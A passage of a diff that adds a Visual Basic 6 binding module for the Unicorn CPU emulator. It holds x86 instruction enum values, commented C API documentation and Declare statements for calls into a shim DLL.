+' UC_X86_INS_VPADDQ = 983 +' UC_X86_INS_VPADDSB = 984 +' UC_X86_INS_VPADDSW = 985 +' UC_X86_INS_VPADDUSB = 986 +' UC_X86_INS_VPADDUSW = 987 +' UC_X86_INS_VPADDW = 988 +' UC_X86_INS_VPALIGNR = 989 +' UC_X86_INS_VPANDD = 990 +' UC_X86_INS_VPANDND = 991 +' UC_X86_INS_VPANDNQ = 992 +' UC_X86_INS_VPANDN = 993 +' UC_X86_INS_VPANDQ = 994 +' UC_X86_INS_VPAND = 995 +' UC_X86_INS_VPAVGB = 996 +' UC_X86_INS_VPAVGW = 997 +' UC_X86_INS_VPBLENDD = 998 +' UC_X86_INS_VPBLENDMB = 999 +' UC_X86_INS_VPBLENDMD = 1000 +' UC_X86_INS_VPBLENDMQ = 1001 +' UC_X86_INS_VPBLENDMW = 1002 +' UC_X86_INS_VPBLENDVB = 1003 +' UC_X86_INS_VPBLENDW = 1004 +' UC_X86_INS_VPBROADCASTB = 1005 +' UC_X86_INS_VPBROADCASTD = 1006 +' UC_X86_INS_VPBROADCASTMB2Q = 1007 +' UC_X86_INS_VPBROADCASTMW2D = 1008 +' UC_X86_INS_VPBROADCASTQ = 1009 +' UC_X86_INS_VPBROADCASTW = 1010 +' UC_X86_INS_VPCLMULQDQ = 1011 +' UC_X86_INS_VPCMOV = 1012 +' UC_X86_INS_VPCMPB = 1013 +' UC_X86_INS_VPCMPD = 1014 +' UC_X86_INS_VPCMPEQB = 1015 +' UC_X86_INS_VPCMPEQD = 1016 +' UC_X86_INS_VPCMPEQQ = 1017 +' UC_X86_INS_VPCMPEQW = 1018 +' UC_X86_INS_VPCMPESTRI = 1019 +' UC_X86_INS_VPCMPESTRM = 1020 +' UC_X86_INS_VPCMPGTB = 1021 +' UC_X86_INS_VPCMPGTD = 1022 +' UC_X86_INS_VPCMPGTQ = 1023 +' UC_X86_INS_VPCMPGTW = 1024 +' UC_X86_INS_VPCMPISTRI = 1025 +' UC_X86_INS_VPCMPISTRM = 1026 +' UC_X86_INS_VPCMPQ = 1027 +' UC_X86_INS_VPCMPUB = 1028 +' UC_X86_INS_VPCMPUD = 1029 +' UC_X86_INS_VPCMPUQ = 1030 +' UC_X86_INS_VPCMPUW = 1031 +' UC_X86_INS_VPCMPW = 1032 +' UC_X86_INS_VPCOMB = 1033 +' UC_X86_INS_VPCOMD = 1034 +' UC_X86_INS_VPCOMPRESSD = 1035 +' UC_X86_INS_VPCOMPRESSQ = 1036 +' UC_X86_INS_VPCOMQ = 1037 +' UC_X86_INS_VPCOMUB = 1038 +' UC_X86_INS_VPCOMUD = 1039 +' UC_X86_INS_VPCOMUQ = 1040 +' UC_X86_INS_VPCOMUW = 1041 +' UC_X86_INS_VPCOMW = 1042 +' UC_X86_INS_VPCONFLICTD = 1043 +' UC_X86_INS_VPCONFLICTQ = 1044 +' UC_X86_INS_VPERM2F128 = 1045 +' UC_X86_INS_VPERM2I128 = 1046 +' UC_X86_INS_VPERMD = 1047 +' UC_X86_INS_VPERMI2D = 1048 +' UC_X86_INS_VPERMI2PD 
= 1049 +' UC_X86_INS_VPERMI2PS = 1050 +' UC_X86_INS_VPERMI2Q = 1051 +' UC_X86_INS_VPERMIL2PD = 1052 +' UC_X86_INS_VPERMIL2PS = 1053 +' UC_X86_INS_VPERMILPD = 1054 +' UC_X86_INS_VPERMILPS = 1055 +' UC_X86_INS_VPERMPD = 1056 +' UC_X86_INS_VPERMPS = 1057 +' UC_X86_INS_VPERMQ = 1058 +' UC_X86_INS_VPERMT2D = 1059 +' UC_X86_INS_VPERMT2PD = 1060 +' UC_X86_INS_VPERMT2PS = 1061 +' UC_X86_INS_VPERMT2Q = 1062 +' UC_X86_INS_VPEXPANDD = 1063 +' UC_X86_INS_VPEXPANDQ = 1064 +' UC_X86_INS_VPEXTRB = 1065 +' UC_X86_INS_VPEXTRD = 1066 +' UC_X86_INS_VPEXTRQ = 1067 +' UC_X86_INS_VPEXTRW = 1068 +' UC_X86_INS_VPGATHERDD = 1069 +' UC_X86_INS_VPGATHERDQ = 1070 +' UC_X86_INS_VPGATHERQD = 1071 +' UC_X86_INS_VPGATHERQQ = 1072 +' UC_X86_INS_VPHADDBD = 1073 +' UC_X86_INS_VPHADDBQ = 1074 +' UC_X86_INS_VPHADDBW = 1075 +' UC_X86_INS_VPHADDDQ = 1076 +' UC_X86_INS_VPHADDD = 1077 +' UC_X86_INS_VPHADDSW = 1078 +' UC_X86_INS_VPHADDUBD = 1079 +' UC_X86_INS_VPHADDUBQ = 1080 +' UC_X86_INS_VPHADDUBW = 1081 +' UC_X86_INS_VPHADDUDQ = 1082 +' UC_X86_INS_VPHADDUWD = 1083 +' UC_X86_INS_VPHADDUWQ = 1084 +' UC_X86_INS_VPHADDWD = 1085 +' UC_X86_INS_VPHADDWQ = 1086 +' UC_X86_INS_VPHADDW = 1087 +' UC_X86_INS_VPHMINPOSUW = 1088 +' UC_X86_INS_VPHSUBBW = 1089 +' UC_X86_INS_VPHSUBDQ = 1090 +' UC_X86_INS_VPHSUBD = 1091 +' UC_X86_INS_VPHSUBSW = 1092 +' UC_X86_INS_VPHSUBWD = 1093 +' UC_X86_INS_VPHSUBW = 1094 +' UC_X86_INS_VPINSRB = 1095 +' UC_X86_INS_VPINSRD = 1096 +' UC_X86_INS_VPINSRQ = 1097 +' UC_X86_INS_VPINSRW = 1098 +' UC_X86_INS_VPLZCNTD = 1099 +' UC_X86_INS_VPLZCNTQ = 1100 +' UC_X86_INS_VPMACSDD = 1101 +' UC_X86_INS_VPMACSDQH = 1102 +' UC_X86_INS_VPMACSDQL = 1103 +' UC_X86_INS_VPMACSSDD = 1104 +' UC_X86_INS_VPMACSSDQH = 1105 +' UC_X86_INS_VPMACSSDQL = 1106 +' UC_X86_INS_VPMACSSWD = 1107 +' UC_X86_INS_VPMACSSWW = 1108 +' UC_X86_INS_VPMACSWD = 1109 +' UC_X86_INS_VPMACSWW = 1110 +' UC_X86_INS_VPMADCSSWD = 1111 +' UC_X86_INS_VPMADCSWD = 1112 +' UC_X86_INS_VPMADDUBSW = 1113 +' UC_X86_INS_VPMADDWD = 1114 +' 
UC_X86_INS_VPMASKMOVD = 1115 +' UC_X86_INS_VPMASKMOVQ = 1116 +' UC_X86_INS_VPMAXSB = 1117 +' UC_X86_INS_VPMAXSD = 1118 +' UC_X86_INS_VPMAXSQ = 1119 +' UC_X86_INS_VPMAXSW = 1120 +' UC_X86_INS_VPMAXUB = 1121 +' UC_X86_INS_VPMAXUD = 1122 +' UC_X86_INS_VPMAXUQ = 1123 +' UC_X86_INS_VPMAXUW = 1124 +' UC_X86_INS_VPMINSB = 1125 +' UC_X86_INS_VPMINSD = 1126 +' UC_X86_INS_VPMINSQ = 1127 +' UC_X86_INS_VPMINSW = 1128 +' UC_X86_INS_VPMINUB = 1129 +' UC_X86_INS_VPMINUD = 1130 +' UC_X86_INS_VPMINUQ = 1131 +' UC_X86_INS_VPMINUW = 1132 +' UC_X86_INS_VPMOVDB = 1133 +' UC_X86_INS_VPMOVDW = 1134 +' UC_X86_INS_VPMOVM2B = 1135 +' UC_X86_INS_VPMOVM2D = 1136 +' UC_X86_INS_VPMOVM2Q = 1137 +' UC_X86_INS_VPMOVM2W = 1138 +' UC_X86_INS_VPMOVMSKB = 1139 +' UC_X86_INS_VPMOVQB = 1140 +' UC_X86_INS_VPMOVQD = 1141 +' UC_X86_INS_VPMOVQW = 1142 +' UC_X86_INS_VPMOVSDB = 1143 +' UC_X86_INS_VPMOVSDW = 1144 +' UC_X86_INS_VPMOVSQB = 1145 +' UC_X86_INS_VPMOVSQD = 1146 +' UC_X86_INS_VPMOVSQW = 1147 +' UC_X86_INS_VPMOVSXBD = 1148 +' UC_X86_INS_VPMOVSXBQ = 1149 +' UC_X86_INS_VPMOVSXBW = 1150 +' UC_X86_INS_VPMOVSXDQ = 1151 +' UC_X86_INS_VPMOVSXWD = 1152 +' UC_X86_INS_VPMOVSXWQ = 1153 +' UC_X86_INS_VPMOVUSDB = 1154 +' UC_X86_INS_VPMOVUSDW = 1155 +' UC_X86_INS_VPMOVUSQB = 1156 +' UC_X86_INS_VPMOVUSQD = 1157 +' UC_X86_INS_VPMOVUSQW = 1158 +' UC_X86_INS_VPMOVZXBD = 1159 +' UC_X86_INS_VPMOVZXBQ = 1160 +' UC_X86_INS_VPMOVZXBW = 1161 +' UC_X86_INS_VPMOVZXDQ = 1162 +' UC_X86_INS_VPMOVZXWD = 1163 +' UC_X86_INS_VPMOVZXWQ = 1164 +' UC_X86_INS_VPMULDQ = 1165 +' UC_X86_INS_VPMULHRSW = 1166 +' UC_X86_INS_VPMULHUW = 1167 +' UC_X86_INS_VPMULHW = 1168 +' UC_X86_INS_VPMULLD = 1169 +' UC_X86_INS_VPMULLQ = 1170 +' UC_X86_INS_VPMULLW = 1171 +' UC_X86_INS_VPMULUDQ = 1172 +' UC_X86_INS_VPORD = 1173 +' UC_X86_INS_VPORQ = 1174 +' UC_X86_INS_VPOR = 1175 +' UC_X86_INS_VPPERM = 1176 +' UC_X86_INS_VPROTB = 1177 +' UC_X86_INS_VPROTD = 1178 +' UC_X86_INS_VPROTQ = 1179 +' UC_X86_INS_VPROTW = 1180 +' UC_X86_INS_VPSADBW = 1181 +' 
UC_X86_INS_VPSCATTERDD = 1182 +' UC_X86_INS_VPSCATTERDQ = 1183 +' UC_X86_INS_VPSCATTERQD = 1184 +' UC_X86_INS_VPSCATTERQQ = 1185 +' UC_X86_INS_VPSHAB = 1186 +' UC_X86_INS_VPSHAD = 1187 +' UC_X86_INS_VPSHAQ = 1188 +' UC_X86_INS_VPSHAW = 1189 +' UC_X86_INS_VPSHLB = 1190 +' UC_X86_INS_VPSHLD = 1191 +' UC_X86_INS_VPSHLQ = 1192 +' UC_X86_INS_VPSHLW = 1193 +' UC_X86_INS_VPSHUFB = 1194 +' UC_X86_INS_VPSHUFD = 1195 +' UC_X86_INS_VPSHUFHW = 1196 +' UC_X86_INS_VPSHUFLW = 1197 +' UC_X86_INS_VPSIGNB = 1198 +' UC_X86_INS_VPSIGND = 1199 +' UC_X86_INS_VPSIGNW = 1200 +' UC_X86_INS_VPSLLDQ = 1201 +' UC_X86_INS_VPSLLD = 1202 +' UC_X86_INS_VPSLLQ = 1203 +' UC_X86_INS_VPSLLVD = 1204 +' UC_X86_INS_VPSLLVQ = 1205 +' UC_X86_INS_VPSLLW = 1206 +' UC_X86_INS_VPSRAD = 1207 +' UC_X86_INS_VPSRAQ = 1208 +' UC_X86_INS_VPSRAVD = 1209 +' UC_X86_INS_VPSRAVQ = 1210 +' UC_X86_INS_VPSRAW = 1211 +' UC_X86_INS_VPSRLDQ = 1212 +' UC_X86_INS_VPSRLD = 1213 +' UC_X86_INS_VPSRLQ = 1214 +' UC_X86_INS_VPSRLVD = 1215 +' UC_X86_INS_VPSRLVQ = 1216 +' UC_X86_INS_VPSRLW = 1217 +' UC_X86_INS_VPSUBB = 1218 +' UC_X86_INS_VPSUBD = 1219 +' UC_X86_INS_VPSUBQ = 1220 +' UC_X86_INS_VPSUBSB = 1221 +' UC_X86_INS_VPSUBSW = 1222 +' UC_X86_INS_VPSUBUSB = 1223 +' UC_X86_INS_VPSUBUSW = 1224 +' UC_X86_INS_VPSUBW = 1225 +' UC_X86_INS_VPTESTMD = 1226 +' UC_X86_INS_VPTESTMQ = 1227 +' UC_X86_INS_VPTESTNMD = 1228 +' UC_X86_INS_VPTESTNMQ = 1229 +' UC_X86_INS_VPTEST = 1230 +' UC_X86_INS_VPUNPCKHBW = 1231 +' UC_X86_INS_VPUNPCKHDQ = 1232 +' UC_X86_INS_VPUNPCKHQDQ = 1233 +' UC_X86_INS_VPUNPCKHWD = 1234 +' UC_X86_INS_VPUNPCKLBW = 1235 +' UC_X86_INS_VPUNPCKLDQ = 1236 +' UC_X86_INS_VPUNPCKLQDQ = 1237 +' UC_X86_INS_VPUNPCKLWD = 1238 +' UC_X86_INS_VPXORD = 1239 +' UC_X86_INS_VPXORQ = 1240 +' UC_X86_INS_VPXOR = 1241 +' UC_X86_INS_VRCP14PD = 1242 +' UC_X86_INS_VRCP14PS = 1243 +' UC_X86_INS_VRCP14SD = 1244 +' UC_X86_INS_VRCP14SS = 1245 +' UC_X86_INS_VRCP28PD = 1246 +' UC_X86_INS_VRCP28PS = 1247 +' UC_X86_INS_VRCP28SD = 1248 +' UC_X86_INS_VRCP28SS = 
1249 +' UC_X86_INS_VRCPPS = 1250 +' UC_X86_INS_VRCPSS = 1251 +' UC_X86_INS_VRNDSCALEPD = 1252 +' UC_X86_INS_VRNDSCALEPS = 1253 +' UC_X86_INS_VRNDSCALESD = 1254 +' UC_X86_INS_VRNDSCALESS = 1255 +' UC_X86_INS_VROUNDPD = 1256 +' UC_X86_INS_VROUNDPS = 1257 +' UC_X86_INS_VROUNDSD = 1258 +' UC_X86_INS_VROUNDSS = 1259 +' UC_X86_INS_VRSQRT14PD = 1260 +' UC_X86_INS_VRSQRT14PS = 1261 +' UC_X86_INS_VRSQRT14SD = 1262 +' UC_X86_INS_VRSQRT14SS = 1263 +' UC_X86_INS_VRSQRT28PD = 1264 +' UC_X86_INS_VRSQRT28PS = 1265 +' UC_X86_INS_VRSQRT28SD = 1266 +' UC_X86_INS_VRSQRT28SS = 1267 +' UC_X86_INS_VRSQRTPS = 1268 +' UC_X86_INS_VRSQRTSS = 1269 +' UC_X86_INS_VSCATTERDPD = 1270 +' UC_X86_INS_VSCATTERDPS = 1271 +' UC_X86_INS_VSCATTERPF0DPD = 1272 +' UC_X86_INS_VSCATTERPF0DPS = 1273 +' UC_X86_INS_VSCATTERPF0QPD = 1274 +' UC_X86_INS_VSCATTERPF0QPS = 1275 +' UC_X86_INS_VSCATTERPF1DPD = 1276 +' UC_X86_INS_VSCATTERPF1DPS = 1277 +' UC_X86_INS_VSCATTERPF1QPD = 1278 +' UC_X86_INS_VSCATTERPF1QPS = 1279 +' UC_X86_INS_VSCATTERQPD = 1280 +' UC_X86_INS_VSCATTERQPS = 1281 +' UC_X86_INS_VSHUFPD = 1282 +' UC_X86_INS_VSHUFPS = 1283 +' UC_X86_INS_VSQRTPD = 1284 +' UC_X86_INS_VSQRTPS = 1285 +' UC_X86_INS_VSQRTSD = 1286 +' UC_X86_INS_VSQRTSS = 1287 +' UC_X86_INS_VSTMXCSR = 1288 +' UC_X86_INS_VSUBPD = 1289 +' UC_X86_INS_VSUBPS = 1290 +' UC_X86_INS_VSUBSD = 1291 +' UC_X86_INS_VSUBSS = 1292 +' UC_X86_INS_VTESTPD = 1293 +' UC_X86_INS_VTESTPS = 1294 +' UC_X86_INS_VUNPCKHPD = 1295 +' UC_X86_INS_VUNPCKHPS = 1296 +' UC_X86_INS_VUNPCKLPD = 1297 +' UC_X86_INS_VUNPCKLPS = 1298 +' UC_X86_INS_VZEROALL = 1299 +' UC_X86_INS_VZEROUPPER = 1300 +' UC_X86_INS_WAIT = 1301 +' UC_X86_INS_WBINVD = 1302 +' UC_X86_INS_WRFSBASE = 1303 +' UC_X86_INS_WRGSBASE = 1304 +' UC_X86_INS_WRMSR = 1305 +' UC_X86_INS_XABORT = 1306 +' UC_X86_INS_XACQUIRE = 1307 +' UC_X86_INS_XBEGIN = 1308 +' UC_X86_INS_XCHG = 1309 +' UC_X86_INS_XCRYPTCBC = 1310 +' UC_X86_INS_XCRYPTCFB = 1311 +' UC_X86_INS_XCRYPTCTR = 1312 +' UC_X86_INS_XCRYPTECB = 1313 +' 
UC_X86_INS_XCRYPTOFB = 1314 +' UC_X86_INS_XEND = 1315 +' UC_X86_INS_XGETBV = 1316 +' UC_X86_INS_XLATB = 1317 +' UC_X86_INS_XRELEASE = 1318 +' UC_X86_INS_XRSTOR = 1319 +' UC_X86_INS_XRSTOR64 = 1320 +' UC_X86_INS_XRSTORS = 1321 +' UC_X86_INS_XRSTORS64 = 1322 +' UC_X86_INS_XSAVE = 1323 +' UC_X86_INS_XSAVE64 = 1324 +' UC_X86_INS_XSAVEC = 1325 +' UC_X86_INS_XSAVEC64 = 1326 +' UC_X86_INS_XSAVEOPT = 1327 +' UC_X86_INS_XSAVEOPT64 = 1328 +' UC_X86_INS_XSAVES = 1329 +' UC_X86_INS_XSAVES64 = 1330 +' UC_X86_INS_XSETBV = 1331 +' UC_X86_INS_XSHA1 = 1332 +' UC_X86_INS_XSHA256 = 1333 +' UC_X86_INS_XSTORE = 1334 +' UC_X86_INS_XTEST = 1335 +' UC_X86_INS_FDISI8087_NOP = 1336 +' UC_X86_INS_FENI8087_NOP = 1337 +' UC_X86_INS_ENDING = 1338 +'End Enum + +'-- [x86 specific] --------------- + +'// Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. +'// Borrow from SegmentCache in qemu/target-i386/cpu.h +'typedef struct uc_x86_mmr { +' uint16_t selector; /* not used by GDTR and IDTR */ +' uint64_t base; /* handle 32 or 64 bit CPUs */ +' uint32_t limit; +' uint32_t flags; /* not used by GDTR and IDTR */ +'} uc_x86_mmr; +' +'// Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr()) +'// @user_data: user data passed to tracing APIs. 
+'typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data); + +'-------------------------------- + +'// Hook type for all events of unmapped memory access +'#define UC_HOOK_MEM_UNMAPPED (UC_HOOK_MEM_READ_UNMAPPED + UC_HOOK_MEM_WRITE_UNMAPPED + UC_HOOK_MEM_FETCH_UNMAPPED) +'// Hook type for all events of illegal protected memory access +'#define UC_HOOK_MEM_PROT (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_FETCH_PROT) +'// Hook type for all events of illegal read memory access +'#define UC_HOOK_MEM_READ_INVALID (UC_HOOK_MEM_READ_PROT + UC_HOOK_MEM_READ_UNMAPPED) +'// Hook type for all events of illegal write memory access +'#define UC_HOOK_MEM_WRITE_INVALID (UC_HOOK_MEM_WRITE_PROT + UC_HOOK_MEM_WRITE_UNMAPPED) +'// Hook type for all events of illegal fetch memory access +'#define UC_HOOK_MEM_FETCH_INVALID (UC_HOOK_MEM_FETCH_PROT + UC_HOOK_MEM_FETCH_UNMAPPED) +'// Hook type for all events of illegal memory access +'#define UC_HOOK_MEM_INVALID (UC_HOOK_MEM_UNMAPPED + UC_HOOK_MEM_PROT) +'// Hook type for all events of valid memory access +'#define UC_HOOK_MEM_VALID (UC_HOOK_MEM_READ + UC_HOOK_MEM_WRITE + UC_HOOK_MEM_FETCH) + + + +'/* +' Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) +' +' @address: address where the code is being executed +' @size: size of machine instruction(s) being executed, or 0 when size is unknown +' @user_data: user data passed to tracing APIs. +'*/ +'typedef void (*uc_cb_hookcode_t)(uc_engine *uc, uint64_t address, uint32_t size, void *user_data); +' public sub code_hook(byval uc as long , byval address as currency, byval size as long, byval user_data as long) +' +'/* +' Callback function for tracing interrupts (for uc_hook_intr()) +' +' @intno: interrupt number +' @user_data: user data passed to tracing APIs. 
+'*/ +'typedef void (*uc_cb_hookintr_t)(uc_engine *uc, uint32_t intno, void *user_data); +' +'/* +' Callback function for tracing IN instruction of X86 +' +' @port: port number +' @size: data size (1/2/4) to be read from this port +' @user_data: user data passed to tracing APIs. +'*/ +'typedef uint32_t (*uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); +' +'/* +' Callback function for OUT instruction of X86 +' +' @port: port number +' @size: data size (1/2/4) to be written to this port +' @value: data value to be written to this port +'*/ +'typedef void (*uc_cb_insn_out_t)(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); +' +'/* +' Callback function for hooking memory (UC_MEM_READ, UC_MEM_WRITE & UC_MEM_FETCH) +' +' @type: this memory is being READ, or WRITE +' @address: address where the code is being executed +' @size: size of data being read or written +' @value: value of data being written to memory, or irrelevant if type = READ. +' @user_data: user data passed to tracing APIs +'*/ +'typedef void (*uc_cb_hookmem_t)(uc_engine *uc, uc_mem_type type, +' uint64_t address, int size, int64_t value, void *user_data); +' +'/* +' Callback function for handling invalid memory access events (UC_MEM_*_UNMAPPED and +' UC_MEM_*PROT events) +' +' @type: this memory is being READ, or WRITE +' @address: address where the code is being executed +' @size: size of data being read or written +' @value: value of data being written to memory, or irrelevant if type = READ. +' @user_data: user data passed to tracing APIs +' +' @return: return true to continue, or false to stop program (due to invalid memory). 
+'*/ +'typedef bool (*uc_cb_eventmem_t)(uc_engine *uc, uc_mem_type type, +' uint64_t address, int size, int64_t value, void *user_data); + +'/* +' Memory region mapped by uc_mem_map() and uc_mem_map_ptr() +' Retrieve the list of memory regions with uc_mem_regions() +'*/ +'typedef struct uc_mem_region { +' uint64_t begin; // begin address of the region (inclusive) +' uint64_t end; // end address of the region (inclusive) +' uint32_t perms; // memory permissions of the region +'} uc_mem_region; +' +'// All type of queries for uc_query() API. +'typedef enum uc_query_type { +' // Dynamically query current hardware mode. +' UC_QUERY_MODE = 1, +' UC_QUERY_PAGE_SIZE, +'} uc_query_type; + + + +Public Declare Function ucs_dynload Lib "ucvbshim.dll" (ByVal path As String) As Long + + + +'/* +' Return combined API version & major and minor version numbers. +' +' @major: major number of API version +' @minor: minor number of API version +' +' @return hexical number as (major << 8 | minor), which encodes both +' major & minor versions. +' NOTE: This returned value can be compared with version number made +' with macro UC_MAKE_VERSION +' +' For example, second API version would return 1 in @major, and 1 in @minor +' The return value would be 0x0101 +' +' NOTE: if you only care about returned value, but not major and minor values, +' set both @major & @minor arguments to NULL. +'*/ +'UNICORN_EXPORT +'unsigned int uc_version(unsigned int *major, unsigned int *minor); +Public Declare Function ucs_version Lib "ucvbshim.dll" (ByRef major As Long, ByRef minor As Long) As Long + + +' +' +'/* +' Determine if the given architecture is supported by this library. +' +' @arch: architecture type (UC_ARCH_*) +' +' @return True if this library supports the given arch. +'*/ +'UNICORN_EXPORT +'bool uc_arch_supported(uc_arch arch); +Public Declare Function ucs_arch_supported Lib "ucvbshim.dll" (ByVal arch As uc_arch) As Long + + +'/* +' Create new instance of unicorn engine. 
+' +' @arch: architecture type (UC_ARCH_*) +' @mode: hardware mode. This is combined of UC_MODE_* +' @uc: pointer to uc_engine, which will be updated at return time +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_open(uc_arch arch, uc_mode mode, uc_engine **uc); +Public Declare Function ucs_open Lib "ucvbshim.dll" (ByVal arch As uc_arch, ByVal mode As uc_mode, ByRef hEngine As Long) As uc_err + + +'/* +' Close UC instance: MUST do to release the handle when it is not used anymore. +' NOTE: this must be called only when there is no longer usage of Unicorn. +' The reason is the this API releases some cached memory, thus access to any +' Unicorn API after uc_close() might crash your application. +' After this, @uc is invalid, and nolonger usable. +' +' @uc: pointer to a handle returned by uc_open() +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_close(uc_engine *uc); +Public Declare Function ucs_close Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err + +' +'/* +' Query internal status of engine. +' +' @uc: handle returned by uc_open() +' @type: query type. See uc_query_type +' +' @result: save the internal status queried +' +' @return: error code of uc_err enum type (UC_ERR_*, see above) +'*/ +'// All type of queries for uc_query() API. +'typedef enum uc_query_type { +' // Dynamically query current hardware mode. +' UC_QUERY_MODE = 1, +' UC_QUERY_PAGE_SIZE, +'} uc_query_type; +'UNICORN_EXPORT +'uc_err uc_query(uc_engine *uc, uc_query_type type, size_t *result); + + + +'/* +' Report the last error number when some API function fail. +' Like glibc's errno, uc_errno might not retain its old value once accessed. 
+' +' @uc: handle returned by uc_open() +' +' @return: error code of uc_err enum type (UC_ERR_*, see above) +'*/ +'UNICORN_EXPORT +'uc_err uc_errno(uc_engine *uc); +Public Declare Function ucs_errno Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err + + +' +'/* +' Return a string describing given error code. +' +' @code: error code (see UC_ERR_* above) +' +' @return: returns a pointer to a string that describes the error code +' passed in the argument @code +' */ +'UNICORN_EXPORT +'const char *uc_strerror(uc_err code); +Public Declare Function ucs_strerror Lib "ucvbshim.dll" (ByVal code As uc_err) As Long + + + +'/* +' Write to register. +' +' @uc: handle returned by uc_open() +' @regid: register ID that is to be modified. +' @value: pointer to the value that will set to register @regid +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_reg_write(uc_engine *uc, int regid, const void *value); +Public Declare Function ucs_reg_write Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal regid As uc_x86_reg, ByRef value As Long) As uc_err + + +'/* +' Read register value. +' +' @uc: handle returned by uc_open() +' @regid: register ID that is to be retrieved. +' @value: pointer to a variable storing the register value. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_reg_read(uc_engine *uc, int regid, void *value); +Public Declare Function ucs_reg_read Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal regid As uc_x86_reg, ByRef value As Long) As uc_err + + + +'/* +' Write multiple register values. +' +' @uc: handle returned by uc_open() +' @rges: array of register IDs to store +' @value: pointer to array of register values +' @count: length of both *regs and *vals +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). 
+'*/ +'UNICORN_EXPORT +'uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count); + + + +' +'/* +' Read multiple register values. +' +' @uc: handle returned by uc_open() +' @rges: array of register IDs to retrieve +' @value: pointer to array of values to hold registers +' @count: length of both *regs and *vals +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count); + + + +'/* +' Write to a range of bytes in memory. +' +' @uc: handle returned by uc_open() +' @address: starting memory address of bytes to set. +' @bytes: pointer to a variable containing data to be written to memory. +' @size: size of memory to write to. +' +' NOTE: @bytes must be big enough to contain @size bytes. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size); +Public Declare Function ucs_mem_write Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef b As Byte, ByVal size As Long) As uc_err + + + +'/* +' Read a range of bytes in memory. +' +' @uc: handle returned by uc_open() +' @address: starting memory address of bytes to get. +' @bytes: pointer to a variable containing data copied from memory. +' @size: size of memory to read. +' +' NOTE: @bytes must be big enough to contain @size bytes. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size); +Public Declare Function ucs_mem_read Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal addr As Currency, ByRef b As Byte, ByVal size As Long) As uc_err + + + + +'/* +' Emulate machine code in a specific duration of time. 
+' +' @uc: handle returned by uc_open() +' @begin: address where emulation starts +' @until: address where emulation stops (i.e when this address is hit) +' @timeout: duration to emulate the code (in microseconds). When this value is 0, +' we will emulate the code in infinite time, until the code is finished. +' @count: the number of instructions to be emulated. When this value is 0, +' we will emulate all the code available, until the code is finished. +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); +Public Declare Function ucs_emu_start Lib "ucvbshim.dll" (ByVal hEngine As Long, ByVal startAt As Currency, ByVal endAt As Currency, ByVal timeout As Currency, ByVal count As Long) As uc_err + + +' +'/* +' Stop emulation (which was started by uc_emu_start() API. +' This is typically called from callback functions registered via tracing APIs. +' NOTE: for now, this will stop the execution only after the current block. +' +' @uc: handle returned by uc_open() +' +' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum +' for detailed error). +'*/ +'UNICORN_EXPORT +'uc_err uc_emu_stop(uc_engine *uc); +Public Declare Function ucs_emu_stop Lib "ucvbshim.dll" (ByVal hEngine As Long) As uc_err + + + +'/* +' Register callback for a hook event. +' The callback will be run when the hook event is hit. +' +' @uc: handle returned by uc_open() +' @hh: hook handle returned from this registration. To be used in uc_hook_del() API +' @type: hook type +' @callback: callback to be run when instruction is hit +' @user_data: user-defined data. 
This will be passed to callback function in its
+' last argument @user_data
+' @begin: start address of the area where the callback is effect (inclusive)
+' @end: end address of the area where the callback is effect (inclusive)
+' NOTE 1: the callback is called only if related address is in range [@begin, @end]
+' NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered
+' @...: variable arguments (depending on @type)
+' NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT)
+'
+' @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum
+' for detailed error).
+'*/
+'UNICORN_EXPORT
+'uc_err __stdcall ucs_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...)
+'
+'note vb6 does not support variable length arguments to api declares so UC_HOOK_INSN would require a separate declare and stub
+'also note that the callback is not used directly, it is proxied through a cdecl stub
+'since the hook flags can be different combos, we pass in a catagory for simplicity in selecting which c callback to use..(bit sloppy but easy)
+Public Declare Function ucs_hook_add Lib "ucvbshim.dll" (ByVal hEngine As Long, ByRef hHook As Long, ByVal hType As uc_hook_type, ByVal callback As Long, ByVal user_data As Long, ByVal beginAt As Currency, ByVal endAt As Currency, ByVal catagory As Long, Optional ByVal inst_id As Long = 0) As uc_err
+
+
